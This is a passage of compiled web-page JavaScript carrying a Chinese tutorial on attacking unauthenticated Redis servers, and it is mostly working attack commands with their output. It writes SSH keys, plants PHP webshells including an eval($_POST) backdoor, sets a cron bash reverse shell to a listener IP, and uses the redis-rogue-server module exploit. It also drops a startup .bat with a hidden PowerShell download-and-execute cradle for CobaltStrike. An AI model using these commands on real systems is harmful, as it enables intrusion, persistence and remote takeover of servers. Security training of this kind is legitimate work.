"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("1")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"test"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" get test\n"),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n\nssh-rsa xxxxxxxxxxxx \n\n\n\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1030),alt:"img"}})]),s._v(" "),e("ul",[e("li",[s._v("✅如上则为成功写入SSH密钥文件,攻击机可无需密码远程连接目标主机SSH")])]),s._v(" "),e("h3",{attrs:{id:"webshell"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell"}},[s._v("#")]),s._v(" WebShell")]),s._v(" "),e("p",[s._v("当SSH不允许远程登录时,也可以通过写入 Web目录控制目标主机")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('┌──(root💀kali)-[~/.ssh]\n└─# redis-cli -h 192.168.0.126 -p 6379\n192.168.0.126:6379> config set dir /var/www/html\nOK\n192.168.0.126:6379> config set dbfilename xxx.php\nOK\n192.168.0.126:6379> set web "\r\n\r\n'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("phpinfo")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('\r\n\r\n"\nOK\n192.168.0.126:6379> 
save\nOK\n')])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1031),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"定时任务"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#定时任务"}},[s._v("#")]),s._v(" 定时任务")]),s._v(" "),e("p",[s._v("也可以通过写入定时任务反弹Shell,获取权限")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击机监听端口 ")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("nc -lvvp 9999")]),e("br"),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set test2 "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.140/9999 0>&1\n\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token 
number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("var")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("spool"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("cron\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename root\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1032),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"主从复制"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#主从复制"}},[s._v("#")]),s._v(" 主从复制")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式")]),e("br"),s._v(" "),e("p",[s._v("Redis未授权访问在4.x/5.0.5以前版本,我们可以使用主/从模式加载远程模块,通过动态链接库的方式执行任意命令。")]),s._v(" "),e("p",[s._v("关于漏洞原理请查看"),e("a",{attrs:{href:"https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf",target:"_blank",rel:"noopener noreferrer"}},[s._v("Pavel Toporkov的分享"),e("OutboundLink")],1)]),s.v(" "),e("p",[s.v("漏洞利用脚本: "),e("a",{attrs:{href:"https://github.com/n0b0dyCN/redis-rogue-server",target:"blank",rel:"noopener noreferrer"}},[s.v("n0b0dyCN/redis-rogue-server"),e("OutboundLink")],1)]),s.v(" "),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s.v("➜ ./redis-rogue-server.py -h\n _ _ ______ _____ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" 
"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" / _"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v("/ / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(" ___ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v("/ / __ _ _ _ ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")]),s._v("--. 
___ _ ____ _____ _ __ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("/ _"),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")])]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" / _"),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")])]),s._v("--. 
"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string"}},[s._v("'\ \ / / _ \ '")]),s._v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" / "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s.v("\")]),s.v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(" / /"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v("/ / / 
"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" V / / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(","),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(", "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(","),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s.v("\")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token 
operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v("/ \n@copyright n0b0dy @ r3kapig\n\nUsage: redis-rogue-server.py "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),s._v("options"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n\nOptions:\n -h, --help show this "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("help")]),s._v(" message and "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("exit")]),s._v("\n --rhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_HOST target "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("host")]),s._v("\n --rport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_PORT target redis port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n --lhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_HOST rogue server "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("ip")]),s._v("\n --lport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_PORT rogue server listen port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("21000")]),s._v("\n --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("EXP_FILE Redis Module to load, default exp.so\n -v, --verbose Show full data stream\nExample\n")])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br"),e("span",{staticClass:"line-number"},[s._v("14")]),e("br"),e("span",{staticClass:"line-number"},[s._v("15")]),e("br"),e("span",{staticClass:"line-number"},[s._v("16")]),e("br"),e("span",{staticClass:"line-number"},[s._v("17")]),e("br"),e("span",{staticClass:"line-number"},[s._v("18")]),e("br"),e("span",{staticClass:"line-number"},[s._v("19")]),e("br"),e("span",{staticClass:"line-number"},[s._v("20")]),e("br"),e("span",{staticClass:"line-number"},[s._v("21")]),e("br"),e("span",{staticClass:"line-number"},[s._v("22")]),e("br")])]),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s._v("python3 redis-rogue-server.py --rhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --lhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("exp.so\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1033),alt:"img"}})]),s._v(" 
"),e("p",[e("img",{attrs:{src:a(1034),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"windows-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#windows-获取权限"}},[s._v("#")]),s._v(" Windows 获取权限")]),s._v(" "),e("h3",{attrs:{id:"webshell-2"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell-2"}},[s._v("#")]),s._v(" Webshell")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击成功的前提为:需要准确的知道Web目录位置")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("可通过 phpinfo 或者 网站报错得知")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1035),alt:"img"}})]),s._v(" "),e("p",[s._v("这里测试的目标路径为:"),e("code",[s._v("C:\phpstudy_pro\WWW")])]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('192.168.0.123:6379> config set dir C:\phpstudy_pro\WWW\nOK\n192.168.0.123:6379> config set dbfilename shell.php\nOK\n192.168.0.123:6379> set test "'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" @"),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("eval")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("$_POST")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token string single-quoted-string"}},[s._v("'shell'")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('"\nOK\n192.168.0.123:6379> save\nOK\n')])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1036),alt:"img"}})]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("成功写入木马,并可连接控制服务器")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1037),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"启动项"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#启动项"}},[s._v("#")]),s._v(" 启动项")]),s._v(" "),e("p",[s._v("攻击方法与写入Linux启动项相似")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("需要高权限账户")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Windows 启动项目录为:")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp")]),e("br"),s._v(" "),e("p",[s._v("首先创建 CobaltStrike监听")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Attacks -> Web Drive-By -> Script Web Delivery")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1038),alt:"img"}})]),s._v(" "),e("p",[s._v("生成 Powershell 语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("powershell"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("exe "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("nop "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("w hidden "),e("span",{pre:!0,attrs:{class:"token 
operator"}},[s._v("-")]),s._v("c "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v(""IEX ((new-object net.webclient).downloadstring('http://192.168.0.126:6666/a'))"")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("执行Redis命令写入语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename cmd"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("bat\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token 
number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set x "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.126:6666/a'))\"\r\n\r\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[s._v("当主机重启时就会执行命令上线 CobaltStrike")]),s._v(" 